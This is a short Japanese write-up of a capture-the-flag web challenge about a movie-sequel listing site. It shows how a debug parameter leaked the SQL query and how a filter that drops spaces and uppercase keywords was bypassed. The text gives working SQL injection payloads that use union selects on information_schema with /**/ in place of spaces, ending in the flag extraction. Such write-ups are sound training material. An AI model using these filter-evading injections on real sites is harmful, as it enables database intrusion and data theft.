Look at all these movie sequels that never got released! Will yours make it through??
Connect here:
http://jh2i.com:50008

映画のリストが取得できるサイトが与えられる。
ソースコードを見ると<!-- if ( isset($_GET["debug"])){ echo($sql_query); } -->とあるので、とりあえず入れてみる。
/index.php?debugに対してPOSTしてみると、Movie Nameとして入力したものがそのまま出てくる。 うーん、SSTI？色々試したけど、違いそう。

"をやってみると、なんか出てくる。

Warning:  mysqli_fetch_array() expects parameter 1 to be mysqli_result, boolean given in /app/index.php on line 68

"#で全部出てくる。

フィルター

• spaceは削除
• SELECT, FROMは消される（小文字は大丈夫っぽい）

ネットを探しまくって以下を通した。

"union(select/**/table_name/**/from`information_schema`.`tables`)#

flagというテーブルがある。

"union(select/**/column_name/**/from`information_schema`.`columns`)#

flagがあるので、flagカラムだろう。

"union/**/select/**/flag/**/from/**/flag#

これで出せる。
回り道したけど、普通に作って、space2commentでスペースを/**/にすればいいだけか。